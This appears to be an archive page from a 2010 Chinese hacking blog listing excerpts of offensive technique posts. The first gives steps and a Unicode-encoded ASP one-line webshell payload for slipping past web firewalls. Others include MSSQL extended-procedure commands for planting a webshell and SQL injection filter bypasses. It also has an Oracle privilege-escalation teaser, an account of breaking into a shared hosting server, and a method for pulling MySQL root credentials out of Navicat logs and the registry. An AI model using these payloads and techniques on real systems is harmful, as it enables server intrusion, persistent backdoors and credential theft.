现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换,
比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。
1.新建一个mdb
2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp;
(实际是<% execute request(“a”)%>)
3.改后缀为asp/asa
...黑面小窝
欢迎光临小窝,有任何问题请留言反馈。QQ:3768110 本站使用全屏模板,导致你访问框架变形的敬请谅解~
2010年9月2日
通过unicode躲开web防火墙过滤,webshell上传全是空格问题
Tags: web安全 黑客
发布:admin | 分类:技术文章 | 评论:1 | 引用:0 | 浏览:
2010年8月30日
sql注入——避开过滤
有的时候,很容易受到SQL注入攻击的程序,可能会进行输入过滤,用来防止攻击者无限制的利用其中存在的设计缺陷。
唱出会删除或者净化一些字符,或者阻止常用的sql关键词。
我们通常有以下几种技巧,去避开这些过滤。
1,避免使用被阻止的字符,即不使用这些字符仍然达到攻击目的。
Tags: 注入
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年8月30日
Adsutil.vbs脚本获取IIS配置信息及账号密码
作者:enjoyhack
今晚在拿站的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。
无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就再帖下,并说明用法!
Tags: web安全 密码 提权
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年8月22日
mssql2005注入
文/图 饭
Web应用程序一般都会使用数据库来保存各种信息,比如电子商务网站的帐户信息、销售商品的价格,订单、支付细节、和各种不同的权限数值等。数据库中的信息的读取、更新、增加或者删除等都是通过SQL来实现的,因此,在数据交互的环节没有安全过滤净化,则可能易于受到SQL注入攻击,严重的可能导致数据库非法操作,但是随着时间的推移,Web应用程序的开发者安全意识的日渐增强,SQL注入漏洞已经呈下降消失状态,但是之前的Web程序在被动防范SQL攻击时,还是略显乏力,或者说是考虑不太周全。比如说普遍使用的过滤关键字的方法,如果仅仅过滤单引号或者小写类的关键字,则极易出现绕过的情形,而国内的安全公司相继推出的硬件WAF是否会存在同样的问题呢?从根本上说硬件WAF基于访问请求流量来鉴别攻击行为,可能在以后的攻防对立的演化过程也会慢慢有爆出被绕过的问题,所有的问题依然存在。本文试着在注入的SQL语句中不引用单引号,来和大家讨论一下注入攻击的部分原理和技巧。在一次测试中,发现一注入点过滤了单引号和小写的关键字,提交语句如下:
Tags: sql 注入
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年8月22日
linux和windows系统直连Oracle数据库注入提权和修复详解
作者:菜牛
收到约镐通知,刚好正研究ORACLE 课题,而国内网上相关主题不是很多,所以就写了此
文,本文详细演示了针对linux 和windows 两种主流操作系统的ORACLE 提权过程,希望
对想了解ORACLE 但又不知道从何入手的朋友有帮助。对于管理员来说,也可以参考此文
看自己的数据库有否存在文中漏洞。
orACLE 数据库简介:
orACLE 是以高级结构化查询语言(SQL)为基础的大型关系数据库,它使用SQL(Structured
Tags: Oracle 注入 提权
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年8月20日
3个MSSQL扩展,可用来获取WEBSHELL
EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
打包
EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
解包,可以用于得到webshell
EXEC [master].[dbo].[xp_readerrorlog] 1,'d:\cmd.asp'
...
Tags: sql
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年7月26日
手注oracle技术
作者:山东信息安全小组 Black.Eagle
声明:笔者在与该网站的站长及负责人联系后做的测试,征得对方同意后放出文章
估计大家读了《oracle注入实战之渗透联通》一文之后都会为之一震,但是笔者不知道读者朋友有没有遇到过和笔者相似的情况,就是用union select语句爆全部的表的时候,根本爆不出来,最多也就能爆出几个来,那该怎么继续呢?这里就用到了我们的UTL_HTTP反弹注射。
Tags: Oracle 注入
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年7月26日
巧用MSSQL读取文件旁注入侵渗透某站
目标站点是老Y文章管理系统v2.5的。在网上找了下,目前基本上没有什么可直接利用的漏洞,于是开始旁注
上http://ip.468w.cn/ 查了下。服务器上150个站,用super injection导入全部站点后批量扫描注入点,很快拿到了服务器一个asp的shell,可是权限很低.几分钟过后又拿到同服另外的一个.net站的 shell,初步看了下,星外的虚拟主机,设置得比较安全,除了当前站点目录和c:\windows\temp可写入,找了许久都没找到一个即可写也可执 行的目录。这样信息获取的就比较少了,所幸在注册表里HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT \INSTALLFREEADMIN\11找到了星外虚拟主机配置信息 mssql sa密码 (32位md5加密,感谢sht同学帮我查询收费记录)
Tags: 提权 注入
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年7月26日
利用navicat提权
navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到
有两个方法提权:
1、从日志文件里找密码,navicat会把操作日志(比如加账户)保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt,低版本是安装目录下的logs下LogHistory.txt
2、navicat管理的MySQL服务器信息(一般是root帐户)是存在注册表里的,具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下,导出注册表导入到本机然后星号察看就OK了。。
...